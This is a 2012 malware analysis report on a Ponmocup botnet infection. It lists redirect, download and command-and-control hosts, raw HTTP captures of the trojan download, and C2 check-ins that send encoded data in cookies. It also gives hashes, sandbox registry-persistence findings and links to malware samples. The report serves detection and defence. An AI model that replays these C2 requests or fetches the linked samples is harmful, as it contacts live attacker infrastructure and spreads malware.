--------------------------------------------------------------------------------
analysis done by @c_APT_ure

this is a new analysis from 2012-11-10, but not very much different from my previous one here:

http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-10-05/analysis.txt

--------------------------------------------------------------------------------

screenshots of malware infection and analysis:
http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-11-10/Screenshots.zip

malware samples, PCAP, registry extract:
http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-11-10/Samples.zip
http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-11-10/Registry.zip
http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-11-10/wireshark-pcap.zip
http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-11-10/Paros.zip

blog posts about Ponmocup malware on my blog:
http://c-apt-ure.blogspot.com/search/label/ponmocup

*** this is a quick analysis report ***

----------------------------------------------------------------------------------------------------

overview network analysis:

* redirect domain:
toktosun.mobilephoneguy.com 178.211.33.205

* malware download:
uy.mitiangis-nagios.com 82.211.45.82

* C2 / phone home:
intohave.com 64.179.44.188  (DNS request only)
88.216.164.117

* URL sample #1:
http://88.216.164.117/entries
(2 x requests with data in cookie values)

* URL sample #2:
http://88.216.164.117/videos/forumdisplay.php
(2 x requests with data in cookie values)

----------------------------------------------------------------------------------------------------
DNS lookups:

toktosun.mobilephoneguy.com 178.211.33.205
uy.mitiangis-nagios.com 82.211.45.82
intohave.com 64.179.44.188

----------------------------------------------------------------------------------------------------
malware infector download:

GET / HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.ch/search?hl=de-CH&source=hp&q=bosa+mariina+hotel&gbv=2&oq=bosa+mariina+hotel&gs_l=heirloom-hp.3..0i13j0i13i30l9.103204.107047.0.110797.18.18.0.0.0.0.343.3107.0j4j8j2.14.0...0.0...1c.1.epm6J4YXrbs
Accept-Language: de-ch
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: uy.mitiangis-nagios.com


HTTP/1.1 200 OK
Server: nginx/1.1.17
Date: Sat, 10 Nov 2012 21:12:24 GMT
Content-Type: application/octet-stream
Content-Length: 573440
Last-Modified: Sat, 10 Nov 2012 20:15:03 GMT
Connection: close
Set-Cookie: PHPSESSID=lrngipi1hcggim5nn6un3mjs15; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: post-check=0, pre-check=0
Accept-Ranges: none
Content-Disposition: attachment; filename="goog1e_hotel_mariina.exe"

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

----------------------------------------------------------------------------------------------------
C2 checkin (1)

GET /entries HTTP/1.1
Accept: */*
Cookie: IMGURSESSION=Vzxt4Ms9VJVfbICIT6FNwjg8vbRZ8dEkx-FI8Kc79AklA2OxflrAymNBgMfKKRYsIIVzVToEvbJhNac0s7wpIQMH28qejqcUIsF5yLmBicosJODmavw06Zz-yVg4s4OWUZd_Levimi0oexrCsjSselSK6JL; core=hIcWCJWOUU9_wNa_YzcrbEM2bP5FXuXGJwkXN8dSRGpZFZQ1wlqlABVOMHlV_cLiZAL8E_DMjWOk4mQaENoRyNmgoCmpI-K629n9IPOK9Ve_onza55d2dYqYiOOZf9dFFV1Yf; WC_PERSISTENT=cswiRe1odR2xh4JHbUXrqQO5t04ohQUd1HHa-2o9ZOr49aEuGW8U8ESHBHZrHXqxTqB13PWoZHAOChjS6P2PyhHjU0DZVlsipWxE6QMebanpZiZ6mlAPoaf5r2tV-BCzwxoCuiVH7O_-ngQ-MMFpnG49iiaedPzmff52dQml7GctV_luheZ4vhtFBXdvyA9HrFudJenfFQKnXJLW; freq=RHPzrTDFd9KyGoGWSR-8pdMKpPWjeaSqt1VuO9h00tek5rH9fWikSU9mAKmvGMz2UzCS69BgxeBYheQYBETN_gvbIyeC26AYLulcLTWZ-UFQRj8MupWYsLUq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 88.216.164.117
Connection: Close
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 404 Not Found
Server: Apache/1.3.42
Date: Sat, 10 Nov 2012 21:19:03 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 205
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /entries was not found on this server.</p>
</body></html>

----------------------------------------------------------------------------------------------------
C2 checkin (2)

GET /entries HTTP/1.1
Accept: */*
Cookie: IMGURSESSION=uU_LFgZNgOcjmR4NbGp5mHnkPXd7pl8xIZMMr5qPSUSHfSqMlbcNZu7bRdVhwPZitCOmN08JOgES4mLrafNo8qU7aoVN3UDzJ_LQjS6uXuwlcRBtmCMEBgUlBy7gqKJhV3zPd1o-oR8RZx4qISwNEf1GaktwZHB_JZ8nGQ0xvJ9A7f4pZlO1ikql8OHO73TiUfdaT8dQOVvqfmX0WmJDzpBa62HaXML7; core=SIrIktXf0JOX-zKOq2W0hPpvGPJ41s8lNCZldD8vTF3whtnVhaBdzbJN5DHQxB_FqrxOCd997IJQxEpcXZSV5N86PGolTbdmQFdOiquuxBV6bZ0V3jo6mLEcz4CDFnHn7FdE4hCUYGYObKKHWdfw8zrdqa; WC_PERSISTENT=NLGEEcjQMwgi59n6TPcDuaDG3JB8vOtTgSgtwusfCQZ0ALhsBrPQ5kDtz8N6yGnuJpjaVh7mw1bFGl5rrdJ5xXedg9ig9C1zqCUUvm-kt3UZeYSPY8tpTv7ITa7RqMi18HopOyZwlMksfn_sP8FjRcekCD7Q4XQkDhDJwwWOpjyvvbQpILL1WDqqufBwjAkdOvWj0gycyCPksnQtf2BCurC7Bvr6a6ypth8ou2UhD6J5hWLkk6BRx5cbtXKfegI4ffrx7GF2V8PmQBAOc61IMGSTdwBphJNN8PuYUZSiWBVRk5Tjs1f_uijbHVO8MtijlJy0MnLDbOAbfCzX7uFsSpkxElEVCkrTtt6QL0jZx9FZ68BlCwYi56TWWgDbpZSJFMWKCLQXit7ZTxmgHWjpVQfMmAx3QmeNkkyjwNuzMDcUOKwtO8rppGQw_Ac0XGjNrsYCNJ6Uvt9SWPK4hy8Z7fTOVEcYhfjapiWu_s0arV6GY9dWphIFPI9TBFLx; freq=-vTmxk-WRXyRO7v7GRUDxK3_WzUvfZg2nCwA6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 88.216.164.117
Connection: Close
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 404 Not Found
Server: Apache/1.3.42
Date: Sat, 10 Nov 2012 21:19:07 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 205
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /entries was not found on this server.</p>
</body></html>

----------------------------------------------------------------------------------------------------
comparing cookie values from 2 checkin requests:

Cookie: 
IMGURSESSION=Vzxt4Ms9VJVfbICIT6FNwjg8vbRZ8dEkx-FI8Kc79AklA2OxflrAymNBgMfKKRYsIIVzVToEvbJhNac0s7wpIQMH28qejqcUIsF5yLmBicosJODmavw06Zz-yVg4s4OWUZd_Levimi0oexrCsjSselSK6JL; 
core=hIcWCJWOUU9_wNa_YzcrbEM2bP5FXuXGJwkXN8dSRGpZFZQ1wlqlABVOMHlV_cLiZAL8E_DMjWOk4mQaENoRyNmgoCmpI-K629n9IPOK9Ve_onza55d2dYqYiOOZf9dFFV1Yf; 
WC_PERSISTENT=cswiRe1odR2xh4JHbUXrqQO5t04ohQUd1HHa-2o9ZOr49aEuGW8U8ESHBHZrHXqxTqB13PWoZHAOChjS6P2PyhHjU0DZVlsipWxE6QMebanpZiZ6mlAPoaf5r2tV-BCzwxoCuiVH7O_-ngQ-MMFpnG49iiaedPzmff52dQml7GctV_luheZ4vhtFBXdvyA9HrFudJenfFQKnXJLW; 
freq=RHPzrTDFd9KyGoGWSR-8pdMKpPWjeaSqt1VuO9h00tek5rH9fWikSU9mAKmvGMz2UzCS69BgxeBYheQYBETN_gvbIyeC26AYLulcLTWZ-UFQRj8MupWYsLUq

Cookie: 
IMGURSESSION=uU_LFgZNgOcjmR4NbGp5mHnkPXd7pl8xIZMMr5qPSUSHfSqMlbcNZu7bRdVhwPZitCOmN08JOgES4mLrafNo8qU7aoVN3UDzJ_LQjS6uXuwlcRBtmCMEBgUlBy7gqKJhV3zPd1o-oR8RZx4qISwNEf1GaktwZHB_JZ8nGQ0xvJ9A7f4pZlO1ikql8OHO73TiUfdaT8dQOVvqfmX0WmJDzpBa62HaXML7; 
core=SIrIktXf0JOX-zKOq2W0hPpvGPJ41s8lNCZldD8vTF3whtnVhaBdzbJN5DHQxB_FqrxOCd997IJQxEpcXZSV5N86PGolTbdmQFdOiquuxBV6bZ0V3jo6mLEcz4CDFnHn7FdE4hCUYGYObKKHWdfw8zrdqa; 
WC_PERSISTENT=NLGEEcjQMwgi59n6TPcDuaDG3JB8vOtTgSgtwusfCQZ0ALhsBrPQ5kDtz8N6yGnuJpjaVh7mw1bFGl5rrdJ5xXedg9ig9C1zqCUUvm-kt3UZeYSPY8tpTv7ITa7RqMi18HopOyZwlMksfn_sP8FjRcekCD7Q4XQkDhDJwwWOpjyvvbQpILL1WDqqufBwjAkdOvWj0gycyCPksnQtf2BCurC7Bvr6a6ypth8ou2UhD6J5hWLkk6BRx5cbtXKfegI4ffrx7GF2V8PmQBAOc61IMGSTdwBphJNN8PuYUZSiWBVRk5Tjs1f_uijbHVO8MtijlJy0MnLDbOAbfCzX7uFsSpkxElEVCkrTtt6QL0jZx9FZ68BlCwYi56TWWgDbpZSJFMWKCLQXit7ZTxmgHWjpVQfMmAx3QmeNkkyjwNuzMDcUOKwtO8rppGQw_Ac0XGjNrsYCNJ6Uvt9SWPK4hy8Z7fTOVEcYhfjapiWu_s0arV6GY9dWphIFPI9TBFLx; 
freq=-vTmxk-WRXyRO7v7GRUDxK3_WzUvfZg2nCwA6

----------------------------------------------------------------------------------------------------

https://www.virustotal.com/file/a8630ced1c314487ce814c4cf8ca0f0cf9e614c3f12b8e2363fdf7a9d5be475e/analysis/1352590563/

SHA256: 	a8630ced1c314487ce814c4cf8ca0f0cf9e614c3f12b8e2363fdf7a9d5be475e
SHA1: 	35a34ea218f8368928ddfd012d5c166eadc2f3f3
MD5: 	636a985d6e14c27ffc4fe6393ec96208
File size: 	560.0 KB ( 573440 bytes )
File name: 	goog1e_hotel_mariina.exe
File type: 	Win32 EXE
Detection ratio: 	2 / 44
Analysis date: 	2012-11-10 23:36:03 UTC ( 0 minutes ago ) 

Kaspersky 	Trojan.Win32.Pirminay.ste 	20121110
Kingsoft 	Win32.Troj.Undef.(kcloud) 	20121105


ssdeep
12288:gLrDFHF0V/8LPHU82ceqoCNR7VVOG2lRxI3eyfoy/IAfPe:ArDFl8s/KctoM76CeCFQI 

PEiD packer identifier
Armadillo v1.71
ExifTool

MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
MachineType..............: Intel 386 or later, and compatibles
TimeStamp................: 2007:04:26 06:23:13+01:00
FileType.................: Win32 EXE
PEType...................: PE32
CodeSize.................: 32768
LinkerVersion............: 6.0
EntryPoint...............: 0x8d5a
InitializedDataSize......: 536576
SubsystemVersion.........: 4.0
ImageVersion.............: 0.0
OSVersion................: 4.0
UninitializedDataSize....: 0

Portable Executable structural information

Compilation timedatestamp.....: 2007-04-26 05:23:13
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00008D5A

PE Sections...................:

Name        Virtual Address  Virtual Size  Raw Size  Entropy  MD5
.text                  4096         32600     32768     6.28  ec3b98a7ed8ca80229d6c44bfdf87484
.rdata                36864          1298      4096     2.01  ba6582a172f3e0f495d5ca60f2b25ced
.data                 40960        532336    532480     5.24  a46b2d7619d45c8995dcd3498cbd8236

----------------------------------------------------------------------------------------------------

http://malwr.com/analysis/636a985d6e14c27ffc4fe6393ec96208/

Analysis Errors
[2012-11-10 15:54:25,359] [Core.DumpFiles] ERROR: Something went wrong while dumping file from "C:\WINDOWS\system32\sortt.exe" to "C:\cuckoo\files": [Errno 13] Permission denied: 'C:\\WINDOWS\\system32\\sortt.exe'.

Network Analysis

DNS Requests +
Hostname 	IP Address
intohave.com 	64.179.44.188

HTTP Requests +

URL 	Data
http://88.216.164.117/videos/forumdisplay.php 	

GET /videos/forumdisplay.php HTTP/1.1
Accept: */*
Cookie: uid=referringpath=IhAvTmZ-yvFGlSxXRC179j39Ni0tsj6JfNxjGZl1IllTPrUVXVvEvu987; clogid=RqVgmLTnjH_rnFB26jUzhfZXbvMXpojJ6VoNwrI0lDYMza9InEmDPY8POeeZly0Hu9CMTU6pIg1uSGylOU33SuPPtUgGAYVxxcSAYGSEE--4Ww; ARSiteUser=server=lhupDdo3B71hgn; _thepoint=7P495GKsqOfLB7idB6D0kuugTc0dyzrYzfb9ahdm36_poGCdA7nKdyASoHiHccsC6JvsNV29bvcQ1LtASMyCjGC901DwY77m_6DTbyP73r5vpcCrwKY3gUMnnHFLSFGc8aYtpWOK3ioCOXbqm5byQCLqq-q7hzRQjrPhkeR4QpzxAwxO9NFixvZn1KcrAbLRwmwhJxVKu-Y_Ipg1XR1bMikYZxqMj1IQDncUzSykhUSfKx0910RtdJ1pnS6EdR06pWolZJcYGBziS89c6qoTZPFpjDdbeWSDTL3FXASnXLPj7qTc6jNqAjf4yLUBN_Z9mKyx7IFDNCeo38GkBrBdqyMjEnOJqtOIBS8541Uo61do2K79_1DkJz1DdeFD7ovEKU7KJLneCaOD3RJN4W4ZCkFkmvqgTKD-9lrqEFSWnmSiO7G8USZczCE
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: 88.216.164.117
Connection: Close
Cache-Control: no-cache
Pragma: no-cache

http://88.216.164.117/videos/forumdisplay.php 	

GET /videos/forumdisplay.php HTTP/1.1
Accept: */*
Cookie: uid=referringpath=rCUpe6z5bLIRfJzl_XuLHdIIi82YQWt1oRRHkn; clogid=WJaldcdGtA894ytGREoZ47y8RFOBCSV8-_lcNmoLieJO4TP9PElI0Mu8Ul7P0GMULgia1UD-TxQaXh4SwH5L9Er-G-C0miMpiNkyC0r7x4fZwPtKQVSubNoZtixKgGPihcAa; ARSiteUser=server=wxasYGLfETKNIgSHXiUFxAP_I76nL; _thepoint=3q0ij9DsxT943zLpOFg3TNCxwrBsfPFmiFVpZW7SqS9ZTcgNutvXTbBTxKeyuq3oapo6zvV2gBcZHKfOkclh4xi8TJos-NouQ_yIkRDM14jMBIfPU1sV5qkuntjPK_NAfUAxp_myaJM895el0S2PAfArW0DaBDy3PLlZY7_z9tfN874Tu-q2hjB3MPhEE2Vyza5uCiXbzbaoaE0PMUIFOSa7Bm5LsW1X-V45cgzMdUDlAILfmbK8A27ociTaTBrz8M-AX8GlxNs1tb78pgX5Z6WV-U61xvRuYca4buCs0SYcHGcYHS9FvYWHfvzSm_CjjFFVfL0SKy3Xmvx-3Hs8PnHUGr-Mp0X3l0ePtoLdPT9-vwDuVEJJk4ZaH_2Zi-fBm8rLa7ZGtA3eyGHMB_GHFIqALbOvq5U-MOOvoziZbzoIK1lI-Gk2-BX1sUPT1k2LvpU2L9avj6zd0trMHLzwZazCg1gnGbSaEA9qQWl7MYcSbsDNq9iULi3J9X5pjSfeX4_I2gOmW8Lv4pdD53lY865P1rnRwU2k6IvzO6bzcPgKiVPv4fmHIa6hobkL0YD1U8tVgFDg_-p5CC1UlPvpCNybKUKY9Ae2Obd-1jcMs5ogSIfSuB1aa95rNisOBgXQ3EegOXQaU4G8sHEtIjTufOiu1noHX7QBslH-aEP41nnBYrZUmz4z7AhrXrs54yFUswhujjlGZY82mf6CWg3FcsUnMRp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: 88.216.164.117
Connection: Close
Cache-Control: no-cache
Pragma: no-cache

----------------------------------------------------------------------------------------------------

http://www.threatexpert.com/report.aspx?md5=636a985d6e14c27ffc4fe6393ec96208

    Submission details:
        Submission received: 10 November 2012, 18:01:32
        Processing time: 6 min 14 sec
        Submitted sample:
            File MD5: 0x636A985D6E14C27FFC4FE6393EC96208
            File SHA-1: 0x35A34EA218F8368928DDFD012D5C166EADC2F3F3
            Filesize: 573,440 bytes

    Summary of the findings:

What's been found	Severity Level
Creates a startup registry entry.	


Registry Modifications

    The following Registry Keys were created:
        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
        HKEY_LOCAL_MACHINE\SOFTWARE\qrjaslop
        HKEY_CURRENT_USER\Software\qrjaslop

    The newly created Registry Values are:
        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
            6 = 5A 0E 6C A2 13 1D 0A A7 E8 8F
        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
            LMITAPUUEQ = "%System%\upnpcontc.exe"

        so that %System%\upnpcontc.exe runs every time Windows starts
        [HKEY_LOCAL_MACHINE\SOFTWARE\qrjaslop]
            URF = 4B F0 35 02 C5 B6 29 9A BF B5 7B FD CD FA E7 F5 75 8E 33 0C 16 14 1B 33 62 77 61 98 FE 64 0D 49 6C AF 06 89 99 F5 37 F0 66 99 A6 48 86 34 1C EA A6 76 40 71 A4 15 3B EC 23 6E 27 BB E4 D3 3C 93 A9 2C 08 30 80 85 73 A1 63 80 D3 29 FF B4 C4 07 5F 60 E7 C
        [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
            6 = 5A 0E 6C A2 13 1D 0A A7 E8 8F
        [HKEY_CURRENT_USER\Software\qrjaslop]
            URF = 4B F0 35 02 C5 B6 29 9A BF B5 7B FD CD FA E7 F5 75 8E 33 0C 16 14 1B 33 62 77 61 98 FE 64 0D 49 6C AF 06 89 99 F5 37 F0 66 99 A6 48 86 34 1C EA A6 76 40 71 A4 15 3B EC 23 6E 27 BB E4 D3 3C 93 A9 2C 08 30 80 85 73 A1 63 80 D3 29 FF B4 C4 07 5F 60 E7 C

Other details

    To mark the presence in the system, the following Mutex object was created:
        WBEMPROVIDERSTATICMUTEX

    The following Host Names were requested from a host database:
        192.5.5.241
        intohave.com

----------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------